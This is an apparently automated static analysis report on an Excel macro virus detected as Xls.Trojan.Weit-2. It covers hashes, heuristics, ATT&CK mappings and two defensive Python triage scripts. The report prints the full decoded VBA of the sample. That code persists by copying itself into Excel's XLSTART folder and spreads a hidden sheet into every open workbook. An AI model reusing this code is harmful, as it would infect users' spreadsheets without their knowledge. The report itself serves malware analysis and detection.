Xls.Trojan.Weit-2 — Office (OLE) malware analysis

Static analysis result for SHA-256 6d99d5ca20e252a6…

MALICIOUS

Office (OLE)

Size: 50.0 KB · Created: 1999-02-08 09:24:15 · Authoring application: Microsoft Excel · First seen: 2015-09-19
MD5: 2d1701024cd47b3abaeff9a1a2a1aa70
SHA-1: 1c92dd11d28064c96d001d72c5009643f082ea73
SHA-256: 6d99d5ca20e252a62cd8ec35b2fc761e5a87a052bc0fc406dc8c82268fe32aa7
Risk score: 268

Malware Insights

Xls.Trojan.Weit-2 · confidence 95%

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

The file is a legacy OLE (.xls) Excel workbook that ClamAV identifies as 'Xls.Trojan.Weit-2'. The decoded VBA (see Extracted artifacts) is a classic self-replicating Excel macro rather than a downloader: auto_open runs as soon as macros are enabled, suppresses screen updates and alerts, and on first run saves a copy of the workbook as _X_X_X_X.XLS into Excel's startup folder (Application.StartupPath, i.e. XLSTART), so the macro is loaded on every later Excel launch. It then copies its hidden 'EXCELLS' sheet into every other open workbook and registers Application.OnSheetDeactivate to call EXCELLS.weitergehts, which repeats the sheet injection whenever the user switches sheets; the startup copy closes itself after infecting. No network activity, shell execution or external payload appears in the visible code, so the observed impact is persistence plus propagation of the macro into other workbooks. A spearphishing attachment is the most likely initial access vector for a document of this kind.
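The replication logic summarised above, as an added triage example that is not part of this report's engine or of the ClamAV signature: a regex indicator scan run over a constructed excerpt of the decoded auto_open (reproducing the lines quoted further down), which also pulls the dropped-file name out of the string literals and derives the startup-folder path to hunt for. The indicator names, the rule for calling a macro self-replicating, and the XLSTART path derivation are this example's own assumptions.

```python
import re

# Constructed excerpt reproducing the replication logic of the decoded auto_open
# shown in this report; the indicator table is this example's own, not the report's.
SAMPLE_VBA = r'''
Sub auto_open()
    Application.ScreenUpdating = False
    Application.DisplayAlerts = False
    startpfad = Application.StartupPath
    startpfad = startpfad + "\_X_X_X_X.XLS"
    If chk_first_time(startpfad) Then
        ActiveWorkbook.SaveCopyAs (startpfad)
    End If
    For Each w In Workbooks
        ThisWorkbook.Sheets("EXCELLS").Copy before:=Workbooks(w.Name).Sheets(1)
        Workbooks(w.Name).Sheets("EXCELLS").Visible = False
        Application.OnSheetDeactivate = ActiveWorkbook.Name & "!EXCELLS.weitergehts"
    Next w
    If ThisWorkbook.Name = "_X_X_X_X.XLS" Then ThisWorkbook.Close
End Sub
'''

# Constructed benign control: an ordinary button handler with none of the indicators.
BENIGN_VBA = 'Sub Button1_Click()\n    MsgBox "constructed benign macro"\nEnd Sub\n'

# Behaviour indicators (names assumed for this example), each a case-insensitive regex.
INDICATORS = {
    "AUTO_EXEC":    r"^\s*(Private\s+|Public\s+)?Sub\s+(auto_open|auto_close|workbook_open)\b",
    "STARTUP_PATH": r"Application\.StartupPath",
    "SELF_COPY":    r"\.(SaveCopyAs|SaveAs)\b",
    "SHEET_INJECT": r"\.Sheets\([^)]*\)\.Copy\b",
    "HIDE_SHEET":   r"\.Visible\s*=\s*False",
    "EVENT_HOOK":   r"Application\.OnSheet\w+\s*=",
    "SUPPRESS_UI":  r"Application\.DisplayAlerts\s*=\s*False",
}
# Assumed rule: auto-exec + startup path + self copy + sheet injection = macro virus pattern.
REPLICATION = {"AUTO_EXEC", "STARTUP_PATH", "SELF_COPY", "SHEET_INJECT"}


def triage_vba(src):
    """Scan VBA source text; return indicators hit, candidate dropped files, verdict."""
    hits = [name for name, pat in INDICATORS.items()
            if re.search(pat, src, re.I | re.M)]
    # Any quoted *.xls literal (with or without a leading path separator) is a
    # candidate dropped-file name; order preserved, duplicates removed.
    names = []
    for m in re.finditer(r'"\\?([^"\\]+\.xls)"', src, re.I):
        if m.group(1) not in names:
            names.append(m.group(1))
    verdict = ("self-replicating macro" if REPLICATION <= set(hits)
               else "no replication pattern")
    return {"indicators": hits, "dropped_files": names, "verdict": verdict}


def startup_iocs(result):
    """Paths to hunt for when STARTUP_PATH fired: Application.StartupPath is XLSTART."""
    if "STARTUP_PATH" not in result["indicators"]:
        return []
    return ["XLSTART\\" + name for name in result["dropped_files"]]


if __name__ == "__main__":
    for label, src in (("sample", SAMPLE_VBA), ("benign", BENIGN_VBA)):
        r = triage_vba(src)
        print(label, r["verdict"], r["indicators"], startup_iocs(r))
```

Run on a real extraction, feed it the olevba output (the macros.bas artifact here) instead of the embedded excerpt; the XLSTART hit is the one to pivot on, because a file in that folder survives deleting the original attachment.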

Heuristics (6)

  • ClamAV: Xls.Trojan.Weit-2 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Weit-2
  • Embedded Office document has suspicious static findings [critical] EMBEDDED_OFFICE_CHILD_STATIC_TRIAGE
    A second CFB/OLE body was carved from inside the sample (here at offset 0x6C25, 23,516 bytes; see Extracted artifacts) and its contents matched Office exploit or payload heuristics. The heuristic exists to catch wrapped exploit documents whose top-level type routes them to a PE, archive, or generic scanner instead of the Office scanner. In this sample the outer file is itself an OLE workbook, so the finding reflects the anomalies of the inner object listed below rather than a mismatched container type.
  • OLE document has large unaccounted-for region [high] OLE_SLACK_ANOMALY
    The carved inner OLE body is 23,516 bytes but its declared streams total only 0 bytes, so all 23,516 bytes (100%) lie in unallocated sector slack. Slack is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached through a parser pointer-corruption bug in the document structure). Note the caveat, though: no shellcode or exploit-trigger finding is reported for this sample, the macro artifact is scored 'Obfuscation or payload: unlikely', and a 100% figure with zero declared streams is exactly what an unreadable directory produces (see OLE_PARSE_EMPTY_STREAMS below). Treat the region as something to carve and inspect by hand, not as a confirmed exploit.
  • VBA macros detected [medium] OLE_VBA_MACROS (1 related finding)
    Document contains VBA macro code
  • Auto_Open macro [low] OLE_VBA_AUTO
    Auto_Open macro: runs without further user interaction once macros are enabled.
    Matched line in script:
    Sub auto_open()
  • CFB header with no readable streams [medium] OLE_PARSE_EMPTY_STREAMS
    The file begins with a valid OLE2/CFB header but exposes no directory streams. A non-empty compound document with an unreadable directory is anomalous: it is seen with truncated or corrupt files and, more importantly, with content deliberately shifted off byte boundaries to defeat parsers while the host application still recovers the object.
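The two structural findings above (declared stream bytes versus unallocated slack, and a valid header whose directory exposes no streams) come down to walking the CFB header, DIFAT, FAT and directory and comparing what the directory accounts for with what the file actually contains. The following is an added example of that walk, not the report's own tooling: it hand-builds two tiny compound files as constructed test data (one normal workbook-style file, one with a root entry only and 4,096 trailing bytes outside any FAT chain) and scores them. It reads only the 109 DIFAT slots in the header and so assumes a file small enough not to need DIFAT sectors; the flag thresholds are assumptions as well.

```python
import struct

MAGIC = b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1"
FATSECT, ENDOFCHAIN, FREESECT = 0xFFFFFFFD, 0xFFFFFFFE, 0xFFFFFFFF
NOSTREAM = 0xFFFFFFFF
SECTOR = 512  # CFB v3, sector shift 9


def _header(num_fat, first_dir, fat_sectors):
    """512-byte CFB v3 header; DIFAT slots beyond the FAT sectors are FREESECT."""
    difat = list(fat_sectors) + [FREESECT] * (109 - len(fat_sectors))
    return (MAGIC + b"\0" * 16
            + struct.pack("<HHHHH", 0x3E, 3, 0xFFFE, 9, 6) + b"\0" * 6
            # dir sector count, FAT count, first dir, txn sig, mini cutoff,
            # first miniFAT, miniFAT count, first DIFAT sector, DIFAT count
            + struct.pack("<9I", 0, num_fat, first_dir, 0, 0x1000,
                          ENDOFCHAIN, 0, ENDOFCHAIN, 0)
            + struct.pack("<109I", *difat))


def _dirent(name, obj_type, start, size, child=NOSTREAM):
    """128-byte directory entry (type 5 = root, 2 = stream, 0 = unused)."""
    raw = name.encode("utf-16-le") + b"\0\0"
    return (raw.ljust(64, b"\0")
            + struct.pack("<HBBIII", len(raw), obj_type, 1, NOSTREAM, NOSTREAM, child)
            + b"\0" * 36                      # CLSID, state bits, timestamps
            + struct.pack("<IQ", start, size))


def _fat(entries):
    entries = list(entries) + [FREESECT] * (SECTOR // 4 - len(entries))
    return struct.pack("<%dI" % (SECTOR // 4), *entries)


def build_normal():
    """Constructed: one 5000-byte 'Workbook' stream occupying sectors 2..11."""
    fat = _fat([FATSECT, ENDOFCHAIN] + list(range(3, 12)) + [ENDOFCHAIN])
    directory = (_dirent("Root Entry", 5, ENDOFCHAIN, 0, child=1)
                 + _dirent("Workbook", 2, 2, 5000) + b"\0" * 256)
    payload = (b"constructed Workbook stream " * 200)[:5000].ljust(10 * SECTOR, b"\0")
    return _header(1, 1, [0]) + fat + directory + payload


def build_anomalous():
    """Constructed: valid header, root entry only, 4096 trailing bytes in no chain."""
    fat = _fat([FATSECT, ENDOFCHAIN])
    directory = _dirent("Root Entry", 5, ENDOFCHAIN, 0) + b"\0" * 384
    return _header(1, 1, [0]) + fat + directory + bytes(range(256)) * 16


def triage_cfb(data):
    """Walk header -> DIFAT -> FAT -> directory; report declared vs. allocated bytes."""
    if data[:8] != MAGIC:
        raise ValueError("not a CFB/OLE2 file")
    sec = 1 << struct.unpack_from("<H", data, 30)[0]
    num_fat, first_dir = struct.unpack_from("<II", data, 44)
    cutoff = struct.unpack_from("<I", data, 56)[0]
    difat = struct.unpack_from("<109I", data, 76)[:num_fat]  # header DIFAT only (assumption)
    fat = []
    for s in difat:
        fat.extend(struct.unpack_from("<%dI" % (sec // 4), data, (s + 1) * sec))

    def chain(start):
        seen = []
        while start < len(fat) and start not in seen:  # sentinels exceed any index
            seen.append(start)
            start = fat[start]
        return seen

    allocated, streams = set(difat), {}
    for ds in chain(first_dir):
        allocated.add(ds)
        for off in range((ds + 1) * sec, (ds + 2) * sec, 128):
            ent = data[off:off + 128]
            if len(ent) < 128:
                break
            name_len, obj_type = struct.unpack_from("<HB", ent, 64)
            start, size = struct.unpack_from("<IQ", ent, 116)
            if obj_type == 5:                      # root: its chain is the mini stream
                allocated.update(chain(start))
            elif obj_type == 2:
                streams[ent[:max(name_len - 2, 0)].decode("utf-16-le", "replace")] = size
                if size >= cutoff:                 # smaller streams live in the mini stream
                    allocated.update(chain(start))
    body = len(data) - sec
    n_sectors = (body + sec - 1) // sec
    slack = sum(min(sec, body - i * sec) for i in range(n_sectors) if i not in allocated)
    return {"file_size": len(data), "streams": streams,
            "declared_total": sum(streams.values()), "unallocated_bytes": slack}


def flags(t):
    """Map the numbers onto the report's two heuristic names (thresholds assumed)."""
    out = []
    if not t["streams"]:
        out.append("OLE_PARSE_EMPTY_STREAMS")
    if t["unallocated_bytes"] * 2 > t["file_size"]:
        out.append("OLE_SLACK_ANOMALY")
    return out


if __name__ == "__main__":
    for label, blob in (("normal", build_normal()), ("anomalous", build_anomalous())):
        t = triage_cfb(blob)
        print(label, t["declared_total"], t["unallocated_bytes"], flags(t))
```

Point triage_cfb at the carved embedded_office_off00006c25.ole artifact to reproduce the report's 0-byte / 100% figures; slack counted this way is sector-granular, so a few hundred bytes of padding at the tail of a legitimately allocated stream never shows up, which is what keeps the heuristic quiet on ordinary workbooks.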

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 4034 bytes
SHA-256: 0a38183ea088ae0db0b5d11dcf9b98c0d2b53b9d733b7e319777032ec3ec00a7
Detection
ClamAV: Xls.Trojan.Weit-2
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet4"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet5"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet6"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "EXCELLS"







Sub auto_open()
Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n14"
Dim startpfad As String

    Application.ScreenUpdating = False
    Application.DisplayAlerts = False
    startpfad = Application.StartupPath
    If Right$(startpfad, 1) = "\" Then
        startpfad = startpfad + "_X_X_X_X.XLS"
    Else
        startpfad = startpfad + "\_X_X_X_X.XLS"
    End If
    If chk_first_time(startpfad) Then
        ActiveWorkbook.SaveCopyAs (startpfad)
    Else
        Close #1
    End If
    If Workbooks.Count <= 1 Then
        Workbooks.Add
    End If
    For Each w In Workbooks
        If w.Name <> ThisWorkbook.Name Then
            If Workbooks(w.Name).Sheets(1).Name <> "EXCELLS" Then
                ThisWorkbook.Sheets("EXCELLS").Copy before:=Workbooks(w.Name).Sheets(1)
                Workbooks(w.Name).Sheets("EXCELLS").Visible = False
                Application.OnSheetDeactivate = ActiveWorkbook.Name & "!EXCELLS.weitergehts"
            End If
        End If
    Next w
    Application.ScreenUpdating = True
    If ThisWorkbook.Name = "_X_X_X_X.XLS" Then
        ThisWorkbook.Close
    Else
        ThisWorkbook.Activate
    End If
End Sub

Function chk_first_time(datei As String) As Integer
Attribute chk_first_time.VB_ProcData.VB_Invoke_Func = " \n14"
    chk_first_time = False
    On Error GoTo fehler
    Open (datei) For Input As 1
    On Error Resume Next
    Exit Function
fehler:
    chk_first_time = True
    Resume Next
End Function

Sub weitergehts()
Attribute weitergehts.VB_ProcData.VB_Invoke_Func = " \n14"
    Application.ScreenUpdating = False
    Application.DisplayAlerts = False
    On Error Resume Next
    For Each w In Workbooks
        If w.Name <> ThisWorkbook.Name Then
            If Workbooks(w.Name).Sheets(1).Name <> "EXCELLS" Then
                ThisWorkbook.Sheets("EXCELLS").Copy before:=Workbooks(w.Name).Sheets(1)
                Workbooks(w.Name).Sheets("EXCELLS").Visible = False
                Application.OnSheetDeactivate = ""
            End If
        End If
    Next w
    Application.ScreenUpdating = True
End Sub
Filename: embedded_office_off00006c25.ole
Kind: embedded-office
Source: Embedded OLE/CFB Office body inside the OLE container at offset 0x6C25
Size: 23516 bytes
SHA-256: d98109068c3b2c485131b3cceb194389cbe9c6b7232eadaef67fabebd43201a0